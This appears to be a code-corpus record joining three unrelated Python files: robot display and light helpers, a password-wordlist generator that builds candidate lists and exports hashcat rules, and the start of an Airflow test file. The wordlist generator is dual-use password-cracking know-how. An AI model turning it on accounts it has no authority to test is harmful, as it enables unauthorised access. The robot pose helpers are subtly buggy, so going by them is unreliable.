def moveCircularCartesianAbs(self, carPointR, carPointT):
return None
def moveCircularCartesianRel(self, carPointR, carPointT):
return None
def setHome(self, jointPoint):
self._home_pos=jointPoint
return True
def getHome(self):
return self._home_pos
def goHome(self):
self._target=self._home_pos
return True
########################################################################
#
# LED Light of the Head
#
class SawyerLight(object):
def __init__(self, enabled=True):
self._light=intera_interface.Lights()
self._enabled=enabled
#
# if you use with Gazebo simulator, you would be disable light...
def enabled(self, val=True):
self._enabled=val
#
# Right
###########################
def head_yellow(self):
if self._enabled:
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_red_light',True)
self._light.set_light_state('head_green_light',True)
#
#
def head_blue(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',True)
#
#
def head_green(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_green_light',True)
#
#
def head_red(self):
if self._enabled:
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',False)
self._light.set_light_state('head_red_light',True)
#
# White
def head_on(self):
if self._enabled:
self._light.set_light_state('head_red_light',True)
self._light.set_light_state('head_green_light',True)
self._light.set_light_state('head_blue_light',True)
#
# Turn off
def head_off(self):
if self._enabled:
self._light.set_light_state('head_red_light',False)
self._light.set_light_state('head_green_light',False)
self._light.set_light_state('head_blue_light',False)
###########################
#########
import PIL.Image,PIL.ImageFont, PIL.ImageDraw
class SawyerDisplay(object):
def __init__(self):
self._image_pub=rospy.Publisher('/robot/head_display', Image, latch=True, queue_size=10)
self._fontname='/usr/share/fonts/truetype/takao-gothic/TakaoGothic.ttf'
if not os.path.exists(self._fontname):
self._fontname='/usr/share/fonts/opentype/NotoSansCJK-Regular.ttc'
self._font24=PIL.ImageFont.truetype(self._fontname, 24, encoding='unic')
self._font32=PIL.ImageFont.truetype(self._fontname, 32, encoding='unic')
self._font42=PIL.ImageFont.truetype(self._fontname, 42, encoding='unic')
self._font48=PIL.ImageFont.truetype(self._fontname, 48, encoding='unic')
self._font64=PIL.ImageFont.truetype(self._fontname, 64, encoding='unic')
self._font=self._font42
self._image=self.mkImage()
self._draw=None
self._sdk_img='sawyer_sdk_research.png'
def mkImage(self, val=128):
img=np.full((600,1024,3), val, dtype=np.uint8)
return img
def mkPILImage(self, val=128):
img=PIL.Image.new('RGB',(1024,600), color=(val,val,val))
self._draw=PIL.ImageDraw.Draw(img)
return img
def clear(self):
self._image=self.mkImage()
self.update()
def update(self):
self.showImage()
def convert2cv(self):
if isinstance(self._image, PIL.Image.Image) :
self._image=np.asarray(self._image)
self._draw=None
def convert2PIL(self):
if self._draw is None:
self._image=PIL.Image.fromarray(self._image)
self._draw=PIL.ImageDraw.Draw(self._image)
def drawText(self, txt, x, l, clear=False):
if clear: self._image=self.mkPILImage()
self.convert2PIL()
pos=(20+x, l*50)
self._draw.text(pos, txt, font=self._font, fill='#ffffff')
self.update()
def drawEllipse(self, param, fill=(255,0,0), outline=(0,0,0), clear=False):
if clear: self._image=self.mkPILImage()
self.convert2PIL()
self._draw.ellipse(param, fill=fill, outline=outline)
self.update()
def putText(self, txt, x, l, clear=False):
if clear: self._image=self.mkImage()
self.convert2cv()
pos=(20+x, l*50)
cv2.putText(self._image, txt, pos, cv2.FONT_HERSHEY_SIMPLEX, 1.2, (255,255,255), 2, cv2.LINE_AA)
self.update()
def showDefault(self):
self.showImage(self._sdk_img)
def showImage(self, img=None):
if img is None:
img=self._image
elif type(img) is str:
img=cv2.imread('images/'+img)
if isinstance(img, PIL.Image.Image):
img=np.asarray(img)
if not rospy.is_shutdown():
cv_img=cv_bridge.CvBridge().cv2_to_imgmsg(img, encoding="bgr8")
self._image_pub.publish(cv_img)
####################################
# Function....
def maxmin(v, mx, mn):
return np.max([np.min([v,mx]), mn])
def newPose(p, qtn):
res=Pose()
Pose.position.x=p[0]
Pose.position.y=p[1]
Pose.position.z=p[2]
Pose.orientation.x=qtn[0]
Pose.orientation.y=qtn[1]
Pose.orientation.z=qtn[2]
Pose.orientation.w=qtn[3]
return res
def addPose(p1, p2):
res=Pose()
Pose.position.x=p1.position.x+p2.position.x
Pose.position.y=p1.position.y+p2.position.y
Pose.position.z=p1.position.z+p2.position.z
Pose.orientation.x=p1.orientation.x+p2.orientation.x
Pose.orientation.y=p1.orientation.y+p2.orientation.y
Pose.orientation.z=p1.orientation.z+p2.orientation.z
Pose.orientation.w=p1.orientation.w+p2.orientation.w
return res
|
model.py
|
#! /usr/bin/env python
import os
import threading
from abc import abstractmethod
import calendar
import datetime
import inspect
import copy
import sys
script_dir = os.path.dirname(os.path.realpath(__file__))
data_dir = os.path.join(script_dir, 'data')
class Serializable(object):
'''
Helper class for serializing chains. Only subclasses and allowed_typenames
are allowed to be serialized, avoiding the security problems of pickle.
'''
allowed_typenames = ['NoneType', 'bool', 'int', 'str', 'list']
def chain_as_string_dict(chain, version):
'''Gets a representation of the chain as a dictionary of strings
'''
chain_dict = {'nodes': [], 'version': version}
for node in chain.nodes:
node_dict = {'attributes': []}
class_name = node.__class__.__name__
if class_name == 'BaseNode':
node_dict['type_'] = 'base'
elif class_name == 'MutateNode':
if node.is_case:
node_dict['type_'] = 'Case'
else:
node_dict['type_'] = 'Substitution'
elif class_name == 'AddNode':
if node.prepend:
node_dict['type_'] = 'Prepend'
else:
node_dict['type_'] = 'Append'
for attr in node.attrs:
attr_dict = {'class_name': attr.__class__.__name__,
'kwargs': {}}
# Get all of the members with names matching args to __init__
for name in inspect.getargspec(attr.__class__.__init__)[0]:
if name in ['self', 'controller']:
continue
val = attr.__dict__[name]
val_class_name = val.__class__.__name__
if val_class_name not in Serializable.allowed_typenames:
raise Exception('Cannot serialize attr of class:',
val_class_name)
attr_dict['kwargs'][name] = val
node_dict['attributes'].append(attr_dict)
chain_dict['nodes'].append(node_dict)
return chain_dict
def load_string_dict(d, controller):
'''Re-creates the chain from a dictionary of strings by calling
add_node() and add_attr() on the controller
'''
# Get the names of all subclasses of Serializable
def get_subclasses(class_):
sub = {class_.__name__}
for subclass in class_.__subclasses__():
sub.update(get_subclasses(subclass))
return sub
allowed_classes = get_subclasses(Serializable)
if len(d['nodes']) == 0 or d['nodes'][0]['type_'] != 'base':
raise Exception('The chain must start with a BaseNode')
for node_dict in d['nodes']:
controller.add_node(type_=node_dict['type_'])
for attr_dict in node_dict['attributes']:
class_name = attr_dict['class_name']
if class_name in allowed_classes:
attr_class = globals()[class_name]
if issubclass(attr_class, ThreadingAttr):
attr_dict['kwargs']['controller'] = controller
controller.add_attr(node_view=controller.mainview.nodes[-1],
attr_class=attr_class,
**attr_dict['kwargs'])
controller.update_counts()
class Chain(Serializable):
'''A chain is a sequence of nodes that produces output words
'''
def __init__(self):
self.nodes = []
self.baseword_count_ = None
def add_node(self, node):
self.nodes.append(node)
self.baseword_count_ = None
def remove_node(self, idx):
for attr in self.nodes[idx].attrs:
attr.stop_calculating() # Stop counting words in FileAttr
del self.nodes[idx]
self.baseword_count_ = None
def get_words(self, basewords_only=False):
'''A generator that yields the chain's words
'''
for attr in self.nodes[0].attrs:
attr.words_read = 0
if basewords_only:
for word in self.nodes[0].get_words([]):
yield word
else:
words = []
for node in self.nodes:
words = node.get_words(words)
for word in words:
yield word
def count_words(self):
'''Returns the total number of words produced by this chain
'''
count = 0
for node in self.nodes:
count = node.count_words(count)
return count
def count_bytes(self):
'''Returns the estimated size in bytes of the password file output
'''
word_count = 0
byte_count = 0
for node in self.nodes:
byte_count = node.count_bytes(byte_count, word_count)
word_count = node.count_words(word_count)
if byte_count > 0:
byte_count += word_count # count the newline characters
return byte_count
def check_hashcat_compatible(self):
'''Returns True if all nodes and their attributes can be turned into
hashcat rules
'''
result = True
for node in self.nodes:
result = result and node.check_hashcat_compatible()
return result
def get_rules(self):
'''Generates a hashcat rulefile representing the chain
return value: the rulefile string
'''
# build up lines of the rule file
# each line is a list of strings
lines = [[]]
for node in self.nodes:
lines = node.get_rules(lines)
return '\n'.join([''.join(line) for line in lines]) + '\n'
def get_progress_percent(self):
'''While get_words is generating output words, this returns an estimate
(integer percent) of how close to completion it is.
'''
if self.baseword_count_ is None:
self.baseword_count_ = 0
for attr in self.nodes[0].attrs:
if attr.calculating:
self.baseword_count_ = None
break
else:
self.baseword_count_ += attr.count_words(0)
if self.baseword_count_ is None:
return 0
else:
progress_count = 0
for attr in self.nodes[0].attrs:
progress_count += attr.words_read
return int(100. * progress_count / self.baseword_count_)
class DuplicateAttrException(Exception):
'''Raised in a node's add_attr to indicate that an identical attribute is
already present
'''
pass
class BaseNode(Serializable):
'''A node produces output words, and may take input words which it may
modify and then output them.
'''
def __init__(self, is_root=True):
'''is_root: bool, whether this is the first attr in the chain
'''
self.is_root = is_root
self.attrs = []
def add_attr(self, attr):
'''Add an attribute to the node. May raise DuplicateAttrException.
'''
if attr in self.attrs:
raise DuplicateAttrException()
else:
self.attrs.append(attr)
def get_words(self, prev_words):
'''A generator that yields the node's words, given the sequence of
input words prev_words
'''
if self.is_root:
assert len(list(prev_words)) == 0 # there cannot be any previous words
for attr in self.attrs:
for word in attr.get_words(prev_words):
yield word
def count_words(self, prev_word_count):
'''Estimates the number of words generated by this node
'''
if self.is_root:
assert prev_word_count == 0
if len(self.attrs) == 0:
return prev_word_count
else:
count = 0
for attr in self.attrs:
count += attr.count_words(prev_word_count)
return count
def count_bytes(self, prev_byte_count, prev_word_count):
'''Estimates the number of bytes in the words generated by this node
'''
if self.is_root:
assert prev_byte_count == 0
byte_count = prev_byte_count
for attr in self.attrs:
byte_count += attr.count_bytes(prev_byte_count, prev_word_count)
return byte_count
def check_hashcat_compatible(self):
result = True
for attr in self.attrs:
result = result and attr.check_hashcat_compatible()
return result
def get_rules(self, lines):
return [[]]
class MutateNode(BaseNode):
'''Changes the characters in the word, including changing the case of
letters and substituting one character for another
'''
def __init__(self, is_case=False):
self.is_case = is_case
BaseNode.__init__(self, is_root=False)
def get_words(self, prev_words):
if len(self.attrs) == 0:
for word in prev_words:
yield word
else:
dedupe = True
if dedupe and len(self.attrs) > 1:
for prev_word in prev_words:
new_words = set()
for attr in self.attrs:
for word in attr.get_words([prev_word]):
new_words.update([word])
for word in new_words:
yield word
else:
for prev_word in prev_words:
for attr in self.attrs:
for word in attr.get_words([prev_word]):
yield word
def count_words(self, prev_word_count):
if len(self.attrs) == 0:
return prev_word_count
if self.is_case:
return BaseNode.count_words(self, prev_word_count)
else:
# Use heuristics to estimate Substitution word count
count = 0
for attr in self.attrs:
if isinstance(attr, NothingMutatorAttr):
count = 1 * prev_word_count
break
for attr in self.attrs:
if isinstance(attr, SubstitutionAttr):
for f in attr.character_freqs:
if count == 0:
count = 1 * prev_word_count
else:
count += int(f * prev_word_count)
return count
def count_bytes(self, prev_byte_count, prev_word_count):
if len(self.attrs) == 0:
return prev_byte_count
if self.is_case:
byte_count = 0
for attr in self.attrs:
byte_count += attr.count_bytes(prev_byte_count, prev_word_count)
else:
byte_count = 0
for attr in self.attrs:
if isinstance(attr, NothingMutatorAttr):
byte_count = 1 * prev_byte_count
break
for attr in self.attrs:
if isinstance(attr, SubstitutionAttr):
for f in attr.character_freqs:
if byte_count == 0:
byte_count = prev_byte_count
else:
byte_count += int(f * prev_byte_count)
return byte_count
def get_rules(self, lines):
new_lines = []
if len(self.attrs) == 0:
for line in lines:
new_lines.append(line + [':'])
for attr in self.attrs:
attr_lines = attr.get_rules()
for attr_line in attr_lines:
for line in lines:
new_line = copy.copy(line)
new_line.append(attr_line)
new_lines.append(new_line)
return new_lines
class AddNode(BaseNode):
'''Append or prepend a string to the word
'''
def __init__(self, prepend=False):
BaseNode.__init__(self, is_root=False)
self.prepend = prepend
def get_words(self, prev_words):
if len(self.attrs) == 0:
for word in prev_words:
yield word
for word in prev_words:
for attr in self.attrs:
for other_word in attr.get_words([]):
if self.prepend:
yield other_word + word
else:
yield word + other_word
def count_words(self, prev_word_count):
if len(self.attrs) == 0:
return prev_word_count
multiplier = 0
for attr in self.attrs:
multiplier += attr.count_words(0)
return multiplier * prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
if len(self.attrs) == 0:
return prev_byte_count
attr_word_count = 0
attr_byte_count = 0
for attr in self.attrs:
attr_word_count += attr.count_words(0)
attr_byte_count += attr.count_bytes(0, 0)
byte_count = BaseNode.count_bytes(self, prev_byte_count, prev_word_count)
return attr_word_count * prev_byte_count + prev_word_count * attr_byte_count
def get_rules(self, lines):
new_lines = []
if len(self.attrs) == 0:
for line in lines:
new_lines.append(line + [':'])
for attr in self.attrs:
if isinstance(attr, NothingAdderAttr):
for line in lines:
new_lines.append(line + [':'])
else:
for word in attr.get_words([]):
for line in lines:
new_line = copy.copy(line)
if self.prepend:
command = '^'
else:
command = '$'
new_line.extend([command + c for c in word])
new_lines.append(new_line)
return new_lines
class BaseAttr(Serializable):
'''An attribute defines the behavior of the node. Typically each attribute
produces one or more words.
'''
def __init__(self, label=""):
self.label = label
self.calculating = False
@abstractmethod
def get_words(self, prev_words):
pass
@abstractmethod
def count_words(self, prev_word_count):
pass
@abstractmethod
def count_bytes(self, prev_byte_count, prev_word_count):
pass
def check_hashcat_compatible(self):
return True
def __eq__(self, other):
'''This is used to avoid duplicate attributes within a node
'''
if self.__class__ != other.__class__:
return False
# This checks whether the two attributes have the same values for their
# __init__ arguments (like in serialization)
result = True
for name in inspect.getargspec(self.__class__.__init__)[0]:
if name in ['self', 'controller']:
continue
if (name in other.__dict__) and (self.__dict__[name] != other.__dict__[name]):
result = False
return result
def __ne__(self, other):
return not self == other
def stop_calculating(self):
'''Stop calculating word counts (only needed for FileAttr)
'''
pass
class StringListAttr(BaseAttr):
def __init__(self, strings, label=""):
BaseAttr.__init__(self, label)
self.strings = strings
self.byte_count = sum(map(len, self.strings))
self.words_read = None # used for the progress indicator
def get_words(self, prev_words=[]):
self.words_read = 0
for word in prev_words:
yield word
for s in self.strings:
self.words_read += 1
yield s
def count_words(self, prev_word_count):
return prev_word_count + len(self.strings)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
class ThreadingAttr(BaseAttr):
'''This indicates that the derived class calculates its word count in
a background thread, takes a controller instance and communicates with it
when it is done calculating
'''
def stop_calculating(self):
self.kill_flag = True
self.worker_thread.join()
'''
def __del__(self):
# note that __del__ is not always called immediately with 'del'
self.stop_calculating()
'''
class FileException(Exception):
'''This is raised when any sort of exception occurs with FileAttr's file
'''
pass
class FileAttr(ThreadingAttr):
'''Generates one word for each line in a file
'''
# named_files is read by the GUI to generate the file menus
named_files = [['English Dictionary', '$DATA_DIR/English_Dict.txt'],
['Common Names', [['Men', '$DATA_DIR/Common_Names_Men.txt'],
['Women', '$DATA_DIR/Common_Names_Women.txt'],
['Pets', '$DATA_DIR/Common_Names_Pets.txt']]],
['Other', [['Slang & Expletives', '$DATA_DIR/Slang_And_Expletives.txt'],
['Months & Seasons', '$DATA_DIR/Months_And_Seasons.txt']]]
]
def __init__(self, path, controller=None, label=""):
BaseAttr.__init__(self, label)
self.path = path
self.controller = controller
self.absolute_path = path.replace('$DATA_DIR', data_dir)
self.file_error = None
try:
self.byte_count = os.stat(self.absolute_path).st_size
# Windows seems to always report an extra two bytes
if sys.platform == 'win32':
self.byte_count -= 2
except Exception as e:
self.file_error = str(e)
self.word_count = 0
self.byte_count = 0
# This is used by the progress bar to keep track of how many lines
# have been read in get_words(). It is reset when the file is done.
self.words_read = None
self.word_count = 1
self.calculating = True
if self.controller is not None:
self.controller.word_calculator_count += 1
self.controller.update_counts() # update word counts to 'Calculating...'
self.worker_thread = threading.Thread(target=self.threaded_word_counter)
self.kill_flag = False
else:
# When there is no controller (in model tests), run the word counter
# in the main thread
self.kill_flag = False
self.threaded_word_counter()
if self.controller is not None:
self.worker_thread.start()
def check_file(self):
'''Check whether the file is present
'''
try:
os.stat(self.absolute_path)
except Exception as e:
self.file_error = str(e)
def threaded_word_counter(self):
'''In order to estimate the number of words, this method is run in a
background thread and reads the number of lines in the input file.
'''
if self.file_error is not None:
self.controller.word_calculator_count -= 1
return
try:
i = 0
try:
with open(self.absolute_path, errors='ignore') as f:
for i, line in enumerate(f):
if self.kill_flag:
break
except Exception as e:
self.file_error = str(e)
self.controller.file_attr_error(self)
return
i += 1
self.word_count = i
self.byte_count -= self.word_count - 1 # don't count newlines
self.calculating = False
if self.controller is not None:
self.controller.word_calculator_count -= 1
self.controller.update_counts()
except Exception as e:
print("Exception while counting words:", e)
def get_words(self, prev_words=[]):
self.words_read = 0
for word in prev_words:
yield word
try:
for line in open(self.absolute_path, errors='surrogateescape'):
if line[-1] == '\n':
line = line[:-1]
self.words_read += 1
yield line
except Exception as e:
self.file_error = str(e)
if self.controller:
self.controller.file_attr_error(self)
raise FileException()
else:
raise
def count_words(self, prev_word_count):
return prev_word_count + self.word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count + self.byte_count
class RangeAttr(BaseAttr):
'''Generates each number in an integer range
'''
def __init__(self, start, end, zfill=0, label=""):
'''
start, end: integers as in Python's range()
zfill: pad with leading zeros to this length
'''
BaseAttr.__init__(self, label)
self.start = start
self.end = end
self.zfill = zfill
self.byte_count = 0
for i in range(self.start, self.end):
self.byte_count += len(str(i).zfill(zfill))
def get_words(self, prev_words):
for word in prev_words:
yield word
for i in range(self.start, self.end):
yield str(i).zfill(self.zfill)
def count_words(self, prev_word_count):
return prev_word_count + (self.end - self.start)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
class DateRangeAttr(ThreadingAttr):
'''Generates numerical date strings for a range of dates with the given format
'''
def __init__(self, start_year, end_year, format, zero_padding, controller=None, label=""):
'''
controller: used to communicate about word counting
start_year, end_year: integers as in Python's range()
format: a string indicating the date format, for example mmddyyyy
zero_padding: a boolean indicating whether single-digit months and days
should have leading zeros
'''
BaseAttr.__init__(self, label)
self.start_year = start_year
self.end_year = end_year
self.format = format
self.zero_padding = zero_padding
self.controller = controller
self.calculating = True
if self.controller is not None:
self.controller.word_calculator_count += 1
self.controller.update_counts() # update word counts to 'Calculating...'
self.worker_thread = threading.Thread(target=self.threaded_word_counter)
self.kill_flag = False
else:
# When there is no controller (in model tests), run the word counter
# in the main thread
self.kill_flag = False
self.threaded_word_counter()
if self.controller is not None:
self.worker_thread.start()
def threaded_word_counter(self):
'''The date strings are pre-computed, but take a few seconds to compute,
so do it in a background thread
'''
# convert the format to a Python format string
four_digit_year = 'yyyy' in self.format
has_year = 'y' in self.format
has_day = 'd' in self.format
type_list = [self.format[0]]
if has_year and has_day:
type_list.append([f for f in ['m', 'd', 'y'] \
if f not in [self.format[0], self.format[-1]]][0])
type_list.append(self.format[-1])
format_items = []
for t in type_list:
format_items.extend(['{', t])
if (t in ['m', 'd'] and self.zero_padding) or (t == 'y'):
format_items.append(':02')
format_items.append('}')
format_string = ''.join(format_items)
self.dates = []
self.byte_count = 0
for year in range(self.start_year, self.end_year):
if self.kill_flag:
break
if four_digit_year:
display_year = year
else:
display_year = year - (year // 100) * 100
for month in range(1, 13):
if has_day:
weekdays, days = calendar.monthrange(year, month)
for day in range(1, days+1):
if self.kill_flag:
break
if has_year:
date = format_string.format(y=display_year, m=month, d=day)
else:
date = format_string.format(m=month, d=day)
if date not in self.dates:
self.dates.append(date)
self.byte_count += len(date)
else:
date = format_string.format(y=display_year, m=month)
self.dates.append(date)
self.byte_count += len(date)
self.calculating = False
if self.controller is not None:
self.controller.word_calculator_count -= 1
if not self.kill_flag:
self.controller.update_counts()
def get_words(self, prev_words):
for word in prev_words:
yield word
for date in self.dates:
yield date
def count_words(self, prev_word_count):
return prev_word_count + len(self.dates)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
def load_codes(location_type, code_type):
'''Load zip codes and area codes
'''
path = os.path.join(data_dir, '-'.join([location_type, code_type])+'.psv')
code_dict = {}
i = 0
for line in open(path).read().split('\n'):
if line == '': continue # allow final newline
location, codes = line.split('|')
i += 1
codes = codes.split(',')
if location in code_dict:
code_dict[location].extend(codes)
else:
code_dict[location] = codes
return code_dict
location_codes = {}
for location_type in ['City', 'State']:
location_codes[location_type] = {}
for code_type in ['Area', 'Zip']:
location_codes[location_type][code_type] = load_codes(location_type, code_type)
def clean_code_file(location_type, code_type):
'''Utility for outputting sorted version of code file with no duplicates
'''
path = os.path.join(data_dir, '-'.join([location_type, code_type])+'.psv')
f = open(path, 'w')
for state, codes in sorted(location_codes[location_type][code_type].items()):
f.write('|'.join([state, ','.join(sorted(set(codes)))])+'\n')
class LocationCodeAttr(BaseAttr):
'''Generates zip codes and area codes
'''
def __init__(self, code_type, location, location_type, label=""):
'''
code_type: 'Area' or 'Zip'
location_type: 'City' or 'State'
location: string, like 'Boston, MA' or 'CA'
'''
BaseAttr.__init__(self, label)
self.code_type = code_type
self.location = location
self.location_type = location_type
codes_dict = location_codes[location_type][code_type]
self.codes = codes_dict[self.location]
self.byte_count = sum(map(len, self.codes))
def get_words(self, prev_words):
for word in prev_words:
yield word
for code in self.codes:
yield code
def count_words(self, prev_word_count):
return prev_word_count + len(self.codes)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
class NothingMutatorAttr(BaseAttr):
'''Generates just the unmodified input words, with no mutation
'''
def get_words(self, prev_words):
return prev_words
def count_words(self, prev_word_count):
return prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
def get_rules(self):
return [':']
class NothingAdderAttr(BaseAttr):
'''Generates just the unmodified input words, with nothing appended
'''
def get_words(self, prev_words):
return [""]
def count_words(self, prev_word_count):
return prev_word_count + 1
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
class CaseAttr(BaseAttr):
'''Modifies the case of letters in the word
'''
def __init__(self, type_, case=None, idx=None, label=""):
'''
type_: 'First' (just the first letter), 'All' (all letters), or 'Toggle'
(switch upper case to lower case, and vice versa)
case: 'Uppercase', 'Lowercase' (change letters to this case), or None
(for Toggle)
idx: Modify the character at this index
'''
BaseAttr.__init__(self, label=label)
self.type_ = type_
self.case = case
self.idx = idx
def get_words(self, prev_words):
for word in prev_words:
if word == "":
yield word
continue
if self.type_ == 'First':
string_list = list(word)
if self.case == 'Lowercase':
string_list[0] = string_list[0].lower()
for i in range(1, len(string_list)):
string_list[i] = string_list[i].upper()
else:
string_list[0] = string_list[0].upper()
for i in range(1, len(string_list)):
string_list[i] = string_list[i].lower()
yield ''.join(string_list)
elif self.type_ == 'All':
if self.case == 'Lowercase':
yield word.lower()
else:
yield word.upper()
elif self.type_ == 'Toggle':
if len(word) > self.idx:
string_list = list(word)
if string_list[self.idx].isupper():
string_list[self.idx] = string_list[self.idx].lower()
else:
string_list[self.idx] = string_list[self.idx].upper()
yield ''.join(string_list)
else:
yield word
def count_words(self, prev_word_count):
return prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
def get_rules(self):
if self.type_ in ['First', 'All']:
rule = {'First': {'Uppercase': 'c',
'Lowercase': 'C'},
'All': {'Uppercase': 'u',
'Lowercase': 'l'},
}[self.type_][self.case]
elif self.type_ == 'Toggle':
rule = 'T{}'.format(self.idx)
return [rule]
# This file contains the percent of English dictionary words containing at least
# one instance of each letter.
character_freq = {}
for line in open(os.path.join(data_dir, 'Letter_Stats.txt')).read().split('\n'):
letter, percent = line.split(',')
character_freq[letter] = float(percent[:-1]) / 100.
class SubstitutionAttr(BaseAttr):
'''Substitutes one character for another
'''
def __init__(self, type_, checked_vals, all_together, label=""):
'''
type_: 'First' (substitute the first instance), 'All' (substitute all
instances), or 'Nth' (substitute the Nth instance)
checked_vals: a list of substitution strings of the form 'old -> new'
all_together: If True, the substitutions in checked_vals will generate
one output word for each substitution matching the
input word, with the substitutions applied one at a time.
If False, just one output word will be generated for each
input word, with all substitutions applied together.
'''
BaseAttr.__init__(self, label=label)
self.type_ = type_
self.checked_vals = checked_vals
self.all_together = all_together
self.replacements = []
for check in checked_vals:
self.replacements.append(check.split(' -> '))
if self.all_together:
self.character_freqs = [0.]
else:
self.character_freqs = []
for original, _ in self.replacements:
freq = character_freq.get(original, 0.)
if all_together:
self.character_freqs[0] += (1. - self.character_freqs[0]) * freq
else:
self.character_freqs.append(freq)
def get_words(self, prev_words):
for word in prev_words:
if word == "":
yield word
continue
string_list = list(word)
if self.type_ in ["First", "All", "Nth"]:
idx_range = range(len(string_list))
else:
idx_range = range(len(string_list) - 1, -1, -1)
found_replacement_word = False
for original, replacement in self.replacements:
found_replacement_sub = False
for i in idx_range:
if string_list[i].lower() == original:
string_list[i] = replacement
found_replacement_word = True
found_replacement_sub = True
if self.type_ in ['First', 'Last']:
if not self.all_together:
yield ''.join(string_list)
string_list = list(word)
break
if self.type_ == 'All' and found_replacement_sub and not self.all_together:
yield ''.join(string_list)
string_list = list(word)
if self.all_together:
yield ''.join(string_list)
elif not found_replacement_word:
yield word
def check_hashcat_compatible(self):
if self.type_ in ['First', 'Last']:
return False
else:
return True
def get_rules(self):
rules = []
for original, replacement in self.replacements:
if len(original) > 1 or len(replacement) > 1:
print('Warning: excluding multi-character substitution, not supported in hashcat rules:', original, replacement)
else:
rules.append('s' + original + replacement)
if self.all_together:
return [''.join(rules)]
else:
return rules
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from typing import Optional
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, models, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks import hdfs_hook
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import (
BaseOperator, Connection, DagBag, DagModel, DagRun, Pool, TaskFail, TaskInstance, Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
